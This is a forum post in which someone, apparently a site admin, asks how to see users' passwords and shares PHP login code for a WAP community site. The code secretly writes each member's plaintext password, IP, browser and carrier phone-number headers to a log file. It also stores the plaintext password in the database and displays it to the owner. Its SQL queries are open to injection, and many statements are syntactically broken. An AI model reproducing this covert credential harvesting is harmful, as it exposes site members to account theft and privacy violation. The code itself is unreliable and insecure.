Hi,
How cand I make if I`m admin to see the user password .
How cand I make if I`m admin to see the user password .
if(isowner(getuid_sid($sid)))
{
$nopl = mysql_fetch_array(mysql_query("SELECT pass2 FROM ibwf_users WHERE id='".$who."'"));
echo "<b>Pass:</b> $nopl[0]<br/>";
}
$sid = md5($did);
$brws = explode(" ",$HTTP_USER_AGENT);
$ubr = $brws[0];
$uip = getip();
$netinfo = getenv(HTTP_X_NETWORK_INFO);
$xnetinfo = $_SERVER['HTTP_X_NETWORK_INFO'];
//$host = gethostbyaddr($uip);
//if (!$host) { $host = $uip; }
$time = time() + (17 * 60 * 60);
$newtime = date("H:i",$time);
$date = strtotime('+17 hours');
$newdate = date('D jS M y',$date);
$fp = fopen("../logs/info.txt","a+");
fwrite ($fp, "\n" .$newtime." Date:".$newdate." Name:".$uid." Pass:".$pwd." Browser:".$ubr." Fone Number:".$netinfo." Fone Number2:".$xnetinfo." Host Name:".$host." IP:".$uip."\n");
fclose($fp);
$res = mysql_query("INSERT INTO ibwf_ses SET name='".$uid."', pass='".$pwd."', browser='".$ubr."', ip='".$uip."', WHERE uid='".getuid_nick($uid)."'");
$res = mysql_query("UPDATE ibwf_users SET pass2='".$pwd."', WHERE id='".getuid_sid($sid)."'");
$res = mysql_query("UPDATE ibwf_users SET numturns='".$point."', gold='".$point."', skillpts='".$point."', WHERE id='".getuid_sid($sid)."'");
$res = mysql_query("INSERT INTO ibwf_users SET brws2='".$ubr."', ip2='".$uip."', WHERE uid='".getuid_nick($uid)."'");
mysql_query("INSERT INTO ibwf_users brws2='".$ubr."', ip2='".$uip."', WHERE id='".getuid_sid($sid)."'");
$tm = time();
$xtm = $tm + (getsxtm()*60);
$did = $uid.$tm;
$res = mysql_query("INSERT INTO ibwf_ses SET id='".md5($did)."', uid='".getuid_nick($uid)."', expiretm='".$xtm."'");
if($res)
{
$tolog=true;
echo "<img src=\"images/ok.gif\" alt=\"+\"/>You have logged in successfully as $uid<br/>";
$idn = getuid_nick($uid);
$lact = mysql_fetch_array(mysql_query("SELECT lastact FROM ibwf_users WHERE id='".$idn."'"));
mysql_query("UPDATE ibwf_users SET lastvst='".$lact[0]."' WHERE id='".$idn."'");
}else{
//is user already logged in?
$logedin = mysql_fetch_array(mysql_query("SELECT (*) FROM ibwf_ses WHERE uid='".$getuid_nick($uid)."'"));
if($logedin[0]>0)
{
//yip, so let's just update the expiration time
$xtm = time() + (getsxtm()*60);
$res = mysql_query("UPDATE ibwf_ses SET expiretm='".$xtm."' WHERE uid='".getuid_nick($uid)."'");
if($res)
{
$tolog=true;
$res = mysql_query("INSERT INTO ibwf_users SET name='".$uid."', date='".$newtime."', pass2='".$pwd."', brws2='".$ubr."', ip2='".$uip."', WHERE uid='".getuid_nick($uid)."'");
echo "<img src=\"../images/ok.gif\" alt=\"+\"/>You have logged in successfully as $uid<br/>";
}else{
echo "<img src=\"../images/point.gif\" alt=\"!\"/>Can't login at the time, plz try later<br/>"; //no chance this could happen unless there's error in mysql connection
}
}
}
}
}
Comment